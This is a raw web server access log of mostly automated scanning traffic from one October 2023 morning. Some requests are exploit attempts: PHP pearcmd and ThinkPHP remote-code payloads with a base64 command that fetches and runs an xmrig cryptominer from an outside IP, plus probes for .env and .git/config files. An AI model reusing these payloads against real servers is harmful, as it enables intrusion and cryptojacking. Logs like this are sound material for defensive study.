198.235.24.106 - - [04/Oct/2023:03:13:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
5.196.102.65 - - [04/Oct/2023:03:25:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
138.197.15.3 - - [04/Oct/2023:03:26:32 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.3 - - [04/Oct/2023:03:26:38 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.3 - - [04/Oct/2023:03:26:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
71.6.134.235 - - [04/Oct/2023:03:27:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.95.147.236 - - [04/Oct/2023:03:28:14 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/ohhellohttpserver.php HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:03:28:14 +0200] "GET /index.php?lang=../../../../../../../../tmp/ohhellohttpserver HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:03:28:14 +0200] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==|base64${IFS}-d|sh HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:03:28:14 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 314 "-" "Custom-HttpClient"
45.95.147.236 - - [04/Oct/2023:03:28:14 +0200] "GET /public/index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=eval&vars[1][]='shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));' HTTP/1.1" 404 321 "-" "Custom-HttpClient"
193.35.18.187 - - [04/Oct/2023:03:29:39 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
193.35.18.187 - - [04/Oct/2023:03:42:01 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
137.184.217.189 - - [04/Oct/2023:03:46:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
165.232.155.61 - - [04/Oct/2023:03:48:03 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.129.35.158 - - [04/Oct/2023:03:54:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.129.35.158 - - [04/Oct/2023:03:54:32 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "http://code.jquery.com/" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:33 +0200] "POST /categories/Yud HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:03:54:34 +0200] "POST /nation.php HTTP/1.1" 404 315 "-" "Mozilla_33741328"
43.129.35.158 - - [04/Oct/2023:03:54:35 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:35 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:36 +0200] "GET /news.php HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:37 +0200] "GET /8.bin HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:37 +0200] "GET /hrsgdsb7386wknzms.jpg HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:38 +0200] "GET /UnityPlayer.dll HTTP/1.1" 404 320 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:38 +0200] "GET /ttd.exe HTTP/1.1" 404 312 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:38 +0200] "GET /qd.CHM HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:39 +0200] "GET /zMLUH93A HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:40 +0200] "GET /Display/chan/IB61I7MYA HTTP/1.1" 404 327 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:40 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:41 +0200] "GET /Gmail/UnityPlayer.txt HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:42 +0200] "GET /new/login HTTP/1.1" 404 314 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:43 +0200] "GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
43.129.35.158 - - [04/Oct/2023:03:54:43 +0200] "GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101"
43.129.35.158 - - [04/Oct/2023:03:54:44 +0200] "GET /jquery.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:03:54:45 +0200] "GET /wh/glass.php HTTP/1.1" 404 317 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:45 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:46 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.129.35.158 - - [04/Oct/2023:03:54:47 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.129.35.158 - - [04/Oct/2023:03:54:47 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:48 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:48 +0200] "GET /uR3b HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:49 +0200] "GET /qZY8 HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:03:54:49 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:03:54:50 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
14.225.252.51 - - [04/Oct/2023:04:00:01 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 400 329 "-" "Hello, World"
109.107.166.15 - - [04/Oct/2023:04:08:43 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:08:48 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:08:50 +0200] "\x03" 501 316 "-" "-"
205.210.31.90 - - [04/Oct/2023:04:08:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:08:58 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:08:59 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:09:02 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:04:09:03 +0200] "\x03" 501 316 "-" "-"
172.104.11.51 - - [04/Oct/2023:04:10:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.129.35.158 - - [04/Oct/2023:04:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.129.35.158 - - [04/Oct/2023:04:11:20 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "http://code.jquery.com/" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:20 +0200] "POST /categories/Yud HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:04:11:21 +0200] "POST /nation.php HTTP/1.1" 404 315 "-" "Mozilla_33741328"
43.129.35.158 - - [04/Oct/2023:04:11:22 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:23 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:23 +0200] "GET /news.php HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:24 +0200] "GET /8.bin HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:24 +0200] "GET /hrsgdsb7386wknzms.jpg HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:25 +0200] "GET /UnityPlayer.dll HTTP/1.1" 404 320 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:25 +0200] "GET /ttd.exe HTTP/1.1" 404 312 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:26 +0200] "GET /qd.CHM HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:26 +0200] "GET /zMLUH93A HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:27 +0200] "GET /Display/chan/IB61I7MYA HTTP/1.1" 404 327 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:28 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:28 +0200] "GET /Gmail/UnityPlayer.txt HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:29 +0200] "GET /new/login HTTP/1.1" 404 314 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:30 +0200] "GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
43.129.35.158 - - [04/Oct/2023:04:11:31 +0200] "GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101"
43.129.35.158 - - [04/Oct/2023:04:11:31 +0200] "GET /jquery.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:04:11:32 +0200] "GET /wh/glass.php HTTP/1.1" 404 317 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:33 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:33 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.129.35.158 - - [04/Oct/2023:04:11:34 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.129.35.158 - - [04/Oct/2023:04:11:34 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:35 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:36 +0200] "GET /8yIb HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:36 +0200] "GET /lO4m HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.129.35.158 - - [04/Oct/2023:04:11:37 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
43.129.35.158 - - [04/Oct/2023:04:11:37 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
162.216.149.61 - - [04/Oct/2023:04:14:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "HELP" 501 319 "-" "-"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "abuse.xmco.fr"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.133.80 - - [04/Oct/2023:04:21:07 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr" 80.133.216.35.bc.googleusercontent.com - - [04/Oct/2023:04:21:07 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
45.79.181.104 - - [04/Oct/2023:04:22:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.155.90.118 - - [04/Oct/2023:04:22:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.104 - - [04/Oct/2023:04:23:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.33.80.243 - - [04/Oct/2023:04:23:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.128.205 - - [04/Oct/2023:04:24:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.128.205 - - [04/Oct/2023:04:26:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.155.90.118 - - [04/Oct/2023:04:26:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.172.21 - - [04/Oct/2023:04:27:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.94 - - [04/Oct/2023:04:29:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
69.164.217.245 - - [04/Oct/2023:04:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [04/Oct/2023:04:32:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
184.105.139.69 - - [04/Oct/2023:04:33:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
184.105.139.68 - - [04/Oct/2023:04:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"
184.105.139.68 - - [04/Oct/2023:04:35:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
184.105.139.68 - - [04/Oct/2023:04:36:39 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"
184.105.139.69 - - [04/Oct/2023:04:36:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
64.62.197.202 - - [04/Oct/2023:04:37:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
184.105.139.69 - - [04/Oct/2023:04:37:50 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.197.210 - - [04/Oct/2023:04:38:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
64.62.197.203 - - [04/Oct/2023:04:39:44 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.180.143.71 - - [04/Oct/2023:04:48:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.71 - - [04/Oct/2023:04:48:06 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
151.74.122.8 - - [04/Oct/2023:04:56:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:04:59:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:04:59:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
162.216.149.179 - - [04/Oct/2023:05:00:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
151.74.122.8 - - [04/Oct/2023:05:00:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
185.181.60.189 - - [04/Oct/2023:05:01:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
151.74.122.8 - - [04/Oct/2023:05:01:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:05:03:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:05:04:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:05:04:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:05:07:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
151.74.122.8 - - [04/Oct/2023:05:07:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
165.232.155.61 - - [04/Oct/2023:05:08:18 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
109.107.166.15 - - [04/Oct/2023:05:12:26 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:05:12:29 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [04/Oct/2023:05:14:01 +0200] "\x03" 501 316 "-" "-"
205.210.31.34 - - [04/Oct/2023:05:16:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.196.8.184 - - [04/Oct/2023:05:23:59 +0200] "CONNECT proxy.korsangazi.com:443 HTTP/1.1" 405 350 "-" "-"
185.196.8.184 - - [04/Oct/2023:05:24:00 +0200] "GET http://proxy.korsangazi.com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1" 404 349 "-" "node-fetch/1.0 (+https://github.com/bitinn/node-fetch)"
41.75.128.149 - - [04/Oct/2023:05:31:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
165.232.155.86 - - [04/Oct/2023:05:34:38 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
35.203.210.236 - - [04/Oct/2023:05:36:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.88.90.10 - - [04/Oct/2023:05:52:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
165.232.155.61 - - [04/Oct/2023:05:55:06 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [04/Oct/2023:05:59:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.35.18.187 - - [04/Oct/2023:06:01:08 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
197.157.192.102 - - [04/Oct/2023:06:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
198.235.24.134 - - [04/Oct/2023:06:16:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.155.76 - - [04/Oct/2023:06:17:42 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [04/Oct/2023:06:17:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
181.214.147.242 - - [04/Oct/2023:06:20:42 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
165.232.155.120 - - [04/Oct/2023:06:21:58 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
84.54.51.12 - - [04/Oct/2023:06:27:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
139.99.9.160 - - [04/Oct/2023:06:30:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
178.32.197.95 - - [04/Oct/2023:06:30:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
213.32.39.44 - - [04/Oct/2023:06:33:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
80.66.88.215 - - [04/Oct/2023:06:41:53 +0200] "\x03" 501 316 "-" "-"
54.36.149.25 - - [04/Oct/2023:06:44:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
45.88.90.10 - - [04/Oct/2023:06:45:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
64.62.197.234 - - [04/Oct/2023:06:47:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
65.49.1.94 - - [04/Oct/2023:06:48:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.88.90.10 - - [04/Oct/2023:06:49:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
